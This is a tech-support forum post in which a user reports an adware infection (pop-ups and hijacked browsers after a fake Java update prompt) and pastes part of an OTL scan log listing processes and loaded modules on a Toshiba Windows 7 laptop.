Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Adware infestation - browsers hijacked, pop-ups, etc. - Astromenda [Cl


  • This topic is locked This topic is locked

#1
mulligabuck

mulligabuck

    Member

  • Member
  • PipPip
  • 62 posts
Mt wife's laptop developed obvious signs of an infection about 48 hours ago. It began with a popup suggesting that she update Java - she clicked on the button in the popup, and almost immediately multiple popups began spawning, each offering a different "security product." OTL log is pasted below. Before bringing the problem to this forum I attempted to clean out the gunk using Malwarebytes and then Kaspersky, with no success. Thanks in advance for your help!

OTL logfile created on: 11/9/2014 9:23:59 PM - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Mom\Desktop
Home Premium Edition (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1.75 Gb Total Physical Memory | 0.76 Gb Available Physical Memory | 43.25% Memory free
3.50 Gb Paging File | 1.89 Gb Available in Paging File | 54.07% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files
Drive C: | 223.33 Gb Total Space | 165.42 Gb Free Space | 74.07% Space Free | Partition Type: NTFS

Computer Name: MOM-PC | User Name: Mom | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2014/11/09 21:23:12 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Mom\Desktop\OTL.exe
PRC - [2014/10/21 20:05:02 | 000,854,344 | ---- | M] (Google Inc.) -- C:\Program Files\Google\Chrome\Application\chrome.exe
PRC - [2014/09/12 01:43:06 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/08/22 11:44:44 | 000,022,192 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft Security Client\MsMpEng.exe
PRC - [2014/08/22 11:41:00 | 000,974,432 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Security Client\msseces.exe
PRC - [2014/04/20 16:15:58 | 000,233,552 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avp.exe
PRC - [2014/04/20 16:15:18 | 000,192,160 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\avpui.exe
PRC - [2014/04/20 01:41:10 | 000,478,912 | ---- | M] (Kaspersky Lab ZAO) -- C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\klwtbws.exe
PRC - [2013/06/25 20:48:08 | 000,228,552 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office14\ONENOTEM.EXE
PRC - [2011/02/25 21:33:07 | 002,614,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2011/02/11 12:45:54 | 001,295,736 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
PRC - [2011/02/11 12:45:52 | 000,054,136 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
PRC - [2009/09/17 14:37:18 | 000,111,960 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
PRC - [2009/09/17 14:36:58 | 001,021,272 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
PRC - [2009/08/10 18:55:46 | 000,185,712 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe
PRC - [2009/08/05 13:18:50 | 000,464,224 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
PRC - [2009/08/05 13:18:08 | 000,476,512 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
PRC - [2009/08/05 13:04:54 | 000,738,616 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
PRC - [2009/07/29 22:54:38 | 000,348,160 | ---- | M] (AMD) -- C:\Windows\System32\atieclxx.exe
PRC - [2009/07/29 22:54:10 | 000,176,128 | ---- | M] (AMD) -- C:\Windows\System32\atiesrxx.exe
PRC - [2009/07/28 19:26:42 | 000,062,848 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
PRC - [2009/07/28 14:43:04 | 000,128,344 | ---- | M] (TOSHIBA Corporation) -- C:\Windows\System32\TODDSrv.exe
PRC - [2009/07/28 13:00:10 | 000,460,088 | ---- | M] (TOSHIBA Corporation) -- C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
PRC - [2009/07/13 17:14:42 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe
PRC - [2009/07/13 14:24:00 | 000,304,496 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
PRC - [2009/03/10 17:51:20 | 000,046,448 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe
PRC - [2009/01/13 20:33:40 | 000,034,088 | ---- | M] (TOSHIBA CORPORATION) -- C:\Program Files\TOSHIBA\Utilities\KeNotify.exe


========== Modules (No Company Name) ==========

MOD - [2014/10/21 20:04:57 | 008,910,664 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\pdf.dll
MOD - [2014/10/21 20:04:51 | 001,042,760 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\libglesv2.dll
MOD - [2014/10/21 20:04:49 | 000,211,272 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\libegl.dll
MOD - [2014/10/21 20:04:48 | 001,681,224 | ---- | M] () -- C:\Program Files\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
MOD - [2013/02/13 19:39:16 | 000,212,992 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.ServiceProce#\bfceac53dda4bf7ba2f5020573f80163\System.ServiceProcess.ni.dll
MOD - [2013/02/13 19:38:56 | 011,824,128 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Web\a00aab40bdf5aed84b4d4294965cf20d\System.Web.ni.dll
MOD - [2013/02/13 19:36:02 | 012,433,920 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\05682429807d34d6ff05a77ea153935f\System.Windows.Forms.ni.dll
MOD - [2013/01/10 21:53:49 | 000,771,584 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\01b47a246b4ec7bfec31bf4503aceda1\System.Runtime.Remoting.ni.dll
MOD - [2013/01/10 21:52:15 | 001,592,832 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\e2ee5d77ebe0bd025e7a7a317a43d677\System.Drawing.ni.dll
MOD - [2013/01/10 21:51:28 | 005,453,312 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Xml\10aba2c167cc1119b80159fd9ac71ca8\System.Xml.ni.dll
MOD - [2013/01/10 21:51:22 | 000,971,264 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\96a3b737db1e72adaf32d2b350e50c23\System.Configuration.ni.dll
MOD - [2013/01/10 21:51:20 | 007,974,400 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System\c54750e64ba10d0fb7b6a636fb3695ca\System.ni.dll
MOD - [2013/01/10 21:51:12 | 011,490,816 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\mscorlib\b0b8554c05f194f546a8ed531320760b\mscorlib.ni.dll
MOD - [2012/06/13 21:40:20 | 008,007,680 | ---- | M] () -- C:\windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll
MOD - [2010/07/07 22:26:16 | 001,736,704 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysManager.Graphics.Wizard\2.0.3497.38831__90ba9c70f846762e\CLI.Aspect.DisplaysManager.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:16 | 000,339,968 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Runtime\2.0.3497.38814__90ba9c70f846762e\CLI.Caste.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:16 | 000,204,800 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.InfoCentre.Graphics.Wizard\2.0.3497.38833__90ba9c70f846762e\CLI.Aspect.InfoCentre.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:16 | 000,077,824 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceTV.Graphics.Runtime\2.0.3497.38880__90ba9c70f846762e\CLI.Aspect.DeviceTV.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:16 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Wizard\2.0.3497.38828__90ba9c70f846762e\CLI.Caste.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:16 | 000,036,864 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceProperty.Graphics.Runtime\2.0.3497.38855__90ba9c70f846762e\CLI.Aspect.DeviceProperty.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:16 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.HotkeysHandling.Graphics.Runtime\2.0.3497.38823__90ba9c70f846762e\CLI.Aspect.HotkeysHandling.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:15 | 000,491,520 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.TransCode.Graphics.Wizard\2.0.3497.38899__90ba9c70f846762e\CLI.Aspect.TransCode.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:15 | 000,331,776 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Dashboard\2.0.3497.38868__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:15 | 000,094,208 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Wizard\2.0.3497.38868__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:15 | 000,073,728 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Dashboard\2.0.3497.38822__90ba9c70f846762e\CLI.Caste.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:15 | 000,065,536 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCV.Graphics.Runtime\2.0.3497.38863__90ba9c70f846762e\CLI.Aspect.DeviceCV.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:15 | 000,061,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Runtime\2.0.3497.38867__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:15 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Welcome.Graphics.Dashboard\2.0.3497.38899__90ba9c70f846762e\CLI.Aspect.Welcome.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:14 | 000,118,784 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Dashboard\2.0.3497.38898__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:14 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Runtime\2.0.3497.38898__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,950,272 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysManager2.Graphics.Dashboard\2.0.3497.38923__90ba9c70f846762e\CLI.Aspect.DisplaysManager2.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,782,336 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Dashboard\2.0.3497.38856__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,573,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Dashboard\2.0.3497.38833__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,409,600 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Wizard\2.0.3497.38875__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:13 | 000,315,392 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Dashboard\2.0.3497.38862__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,307,200 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Wizard\2.0.3497.38837__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Wizard.dll
MOD - [2010/07/07 22:26:13 | 000,196,608 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.InfoCentre.Graphics.Dashboard\2.0.3497.38833__90ba9c70f846762e\CLI.Aspect.InfoCentre.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,094,208 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Dashboard\2.0.3497.38861__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:13 | 000,081,920 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Runtime\2.0.3497.38856__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,061,440 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceDFP.Graphics.Runtime\2.0.3497.38855__90ba9c70f846762e\CLI.Aspect.DeviceDFP.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Runtime\2.0.3497.38837__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,036,864 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Runtime\2.0.3497.38860__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:13 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Runtime\2.0.3497.38862__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:12 | 000,393,216 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Dashboard\2.0.3497.38855__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:12 | 000,270,336 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
MOD - [2010/07/07 22:26:12 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Runtime\2.0.3497.38856__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Runtime.dll
MOD - [2010/07/07 22:26:12 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.Hotkeys.Shared\2.0.3428.28304__90ba9c70f846762e\AEM.Plugin.Hotkeys.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Actions.CCAA.Shared\2.0.3428.28302__90ba9c70f846762e\AEM.Actions.CCAA.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.WinMessages.Shared\2.0.3428.28311__90ba9c70f846762e\AEM.Plugin.WinMessages.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.REG.Shared\2.0.3428.28329__90ba9c70f846762e\AEM.Plugin.REG.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.GD.Shared\2.0.3428.28327__90ba9c70f846762e\AEM.Plugin.GD.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.EEU.Shared\2.0.3428.28311__90ba9c70f846762e\AEM.Plugin.EEU.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.DPPE.Shared\2.0.3428.28327__90ba9c70f846762e\AEM.Plugin.DPPE.Shared.dll
MOD - [2010/07/07 22:26:12 | 000,007,168 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\atixclib\1.0.0.0__90ba9c70f846762e\atixclib.dll
MOD - [2010/07/07 22:26:11 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Graphics.I0601\2.0.2573.17685__90ba9c70f846762e\DEM.Graphics.I0601.dll
MOD - [2010/07/07 22:26:11 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation\2.0.3428.28296__90ba9c70f846762e\LOG.Foundation.dll
MOD - [2010/07/07 22:26:11 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\NEWAEM.Foundation\2.0.3428.28297__90ba9c70f846762e\NEWAEM.Foundation.dll
MOD - [2010/07/07 22:26:11 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Foundation.XManifest\2.0.3428.28354__90ba9c70f846762e\CLI.Foundation.XManifest.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\MOM.Foundation\2.0.3428.28310__90ba9c70f846762e\MOM.Foundation.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Graphics.I0706\2.0.2743.23304__90ba9c70f846762e\DEM.Graphics.I0706.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Graphics\2.0.3428.28324__90ba9c70f846762e\DEM.Graphics.dll
MOD - [2010/07/07 22:26:11 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\DEM.Foundation\2.0.2573.17684__90ba9c70f846762e\DEM.Foundation.dll
MOD - [2010/07/07 22:26:10 | 000,098,304 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Shared\2.0.3428.28305__90ba9c70f846762e\CLI.Caste.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,094,208 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Foundation\2.0.3428.28298__90ba9c70f846762e\CLI.Foundation.dll
MOD - [2010/07/07 22:26:10 | 000,053,248 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Shared\2.0.3428.28315__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.TransCode.Graphics.Shared\2.0.3428.28324__90ba9c70f846762e\CLI.Aspect.TransCode.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Shared\2.0.3428.28323__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,024,576 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Dashboard.Shared\2.0.3428.28304__90ba9c70f846762e\CLI.Component.Dashboard.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Wizard.Shared\2.0.3428.28308__90ba9c70f846762e\CLI.Component.Wizard.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Client.Shared\2.0.3428.28302__90ba9c70f846762e\CLI.Component.Client.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime.Shared\2.0.3428.28303__90ba9c70f846762e\CLI.Component.Runtime.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Wizard.Shared\2.0.3428.28313__90ba9c70f846762e\CLI.Caste.Graphics.Wizard.Shared.dll
MOD - [2010/07/07 22:26:10 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Dashboard.Shared\2.0.3428.28312__90ba9c70f846762e\CLI.Caste.Graphics.Dashboard.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,065,536 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceTV.Graphics.Shared\2.0.3428.28316__90ba9c70f846762e\CLI.Aspect.DeviceTV.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,053,248 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,053,248 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,049,152 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceDFP.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.DeviceDFP.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCV.Graphics.Shared\2.0.3428.28315__90ba9c70f846762e\CLI.Aspect.DeviceCV.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,032,768 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceProperty.Graphics.Shared\2.0.3428.28309__90ba9c70f846762e\CLI.Aspect.DeviceProperty.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Shared\2.0.3428.28313__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Shared\2.0.3428.28312__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,028,672 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.CustomFormats.Graphics.Shared\2.0.3428.28311__90ba9c70f846762e\CLI.Aspect.CustomFormats.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,024,576 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Shared\2.0.3428.28314__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Aspect.HotkeysHandling.Graphics.Shared\2.0.3428.28312__90ba9c70f846762e\CLI.Aspect.HotkeysHandling.Graphics.Shared.dll
MOD - [2010/07/07 22:26:09 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\APM.Foundation\2.0.3428.28310__90ba9c70f846762e\APM.Foundation.dll
MOD - [2010/07/07 22:26:09 | 000,016,384 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Server.Shared\2.0.3428.28304__90ba9c70f846762e\AEM.Server.Shared.dll
MOD - [2010/07/07 22:26:08 | 000,405,504 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Wizard\2.0.3497.38827__90ba9c70f846762e\CLI.Component.Wizard.dll
MOD - [2010/07/07 22:26:08 | 000,106,496 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\MOM.Implementation\2.0.3497.38894__90ba9c70f846762e\MOM.Implementation.dll
MOD - [2010/07/07 22:26:08 | 000,065,536 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation.Implementation\2.0.3497.38892__90ba9c70f846762e\LOG.Foundation.Implementation.dll
MOD - [2010/07/07 22:26:08 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\AEM.Plugin.Source.Kit.Server\2.0.3497.38904__90ba9c70f846762e\AEM.Plugin.Source.Kit.Server.dll
MOD - [2010/07/07 22:26:08 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Foundation.Private\2.0.3428.28301__90ba9c70f846762e\CLI.Foundation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,036,864 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation.Private\2.0.3428.28303__90ba9c70f846762e\LOG.Foundation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,024,576 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Wizard.Shared.Private\2.0.3428.28311__90ba9c70f846762e\CLI.Component.Wizard.Shared.Private.dll
MOD - [2010/07/07 22:26:08 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\ResourceManagement.Foundation.Private\2.0.3428.28303__90ba9c70f846762e\ResourceManagement.Foundation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\LOG.Foundation.Implementation.Private\2.0.3428.28310__90ba9c70f846762e\LOG.Foundation.Implementation.Private.dll
MOD - [2010/07/07 22:26:08 | 000,007,168 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime.Extension.EEU\2.0.3497.38810__90ba9c70f846762e\CLI.Component.Runtime.Extension.EEU.dll
MOD - [2010/07/07 22:26:07 | 001,212,416 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Dashboard\2.0.3497.38819__90ba9c70f846762e\CLI.Component.Dashboard.dll
MOD - [2010/07/07 22:26:07 | 000,057,344 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.SkinFactory\2.0.3497.38813__90ba9c70f846762e\CLI.Component.SkinFactory.dll
MOD - [2010/07/07 22:26:07 | 000,057,344 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime\2.0.3497.38812__90ba9c70f846762e\CLI.Component.Runtime.dll
MOD - [2010/07/07 22:26:07 | 000,045,056 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Runtime.Shared.Private\2.0.3428.28311__90ba9c70f846762e\CLI.Component.Runtime.Shared.Private.dll
MOD - [2010/07/07 22:26:07 | 000,040,960 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Client.Shared.Private\2.0.3428.28308__90ba9c70f846762e\CLI.Component.Client.Shared.Private.dll
MOD - [2010/07/07 22:26:07 | 000,020,480 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\CLI.Component.Dashboard.Shared.Private\2.0.3428.28309__90ba9c70f846762e\CLI.Component.Dashboard.Shared.Private.dll
